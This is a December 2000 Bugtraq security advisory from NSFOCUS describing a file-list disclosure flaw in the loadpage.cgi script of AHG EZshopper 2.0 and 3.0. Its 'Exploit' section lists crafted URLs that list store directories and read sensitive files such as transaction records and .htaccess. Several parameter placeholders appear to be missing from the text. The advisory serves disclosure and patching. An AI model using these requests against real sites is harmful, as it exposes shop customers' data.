From security@NSFOCUS.COM Thu Dec 14 17:20:09 2000 From: Nsfocus Security Team To: BUGTRAQ@SECURITYFOCUS.COM Date: Wed, 13 Dec 2000 15:23:42 +0800 Subject: [BUGTRAQ] NSFOCUS SA2000-09 : AHG EZshopper Loadpage.cgi File List Disclosure Vulnerability NSFOCUS Security Advisory(SA2000-09) Topic: AHG EZshopper Loadpage.cgi File List Disclosure Vulnerability Release Date£º Dec 13rd, 2000 CVE Candidate Numbers: CAN-2000-1092 Affected system: ================ Alex Heiphetz Group EZshopper v.3.0 for Unix Alex Heiphetz Group EZshopper v.2.0 for Unix Impact: ======= NSFOCUS security team has found a security flaw in loadpage.cgi of EZshopper of AHG. Exploitation of it can allow attacker to get file list of EZshopper directories and sensitive file contents. Description£º ============ EZshopper is a popular e-shop product by AHG, Inc.(www.ahg.com). It has some Perl scripts, including a CGI program that is called loadpage.cgi and used to open and show the HTML files under EZshopper directory. Usually this program is called in these ways: EZshopper v3.0£º http://site/cgi-bin/ezshopper3/loadpage.cgi?user_id=&file= EZshopper v2.0£º http://site/cgi-bin/ezshopper2/loadpage.cgi?+ But loadpage.cgi does not check the "" data inputted by user to make sure it is an real file name. Provided with a directory name as a "", loadpage.cgi will list the content of current EZshopper directory. According to the returned information, attacker can open subdirectory or view some sensitive file contents like user's data files, transaction info file and .htaccess etc. Note: Exploit of this vulnerability won't be used to view the directories outside of EZshopper, for new versions of EZshopper will check if a filename contains "../". Exploit: ========== Submit the following URL, you can see the file list of Ezshopper root directory. (In case that the page is blank, check the page source code in the browser.) EZshopper v3.0£º http://site/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/ EZshopper v2.0£º http://site/cgi-bin/ezshopper2/loadpage.cgi?id+/ To view file list of EZshopper subdirectory, submit the following URL: EZshopper v3.0£º http://site/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/subdirectory/ EZshopper v2.0£º http://site/cgi-bin/ezshopper2/loadpage.cgi?id+/subdirectory/ Once get the list, attacker can use some URL like the following to view the content of arbitrary files: http://site/cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=// http://site/cgi-bin/ezshopper2/loadpage.cgi?+// Vendor Status: ============== Vendor has been informed on Dec. 4th, 2000. We suggest users using vulnerable versions to upgrade to the latest version ASAP. Vendor's homepage: http://www.ahg.com/ Additional Information: ======================== The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2000-1092 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Candidates may change significantly before they become official CVE entries. DISCLAIMS: ========== THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY. ?Copyright 1999-2000 NSFOCUS. All Rights Reserved. Terms of use. NSFOCUS Security Team NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)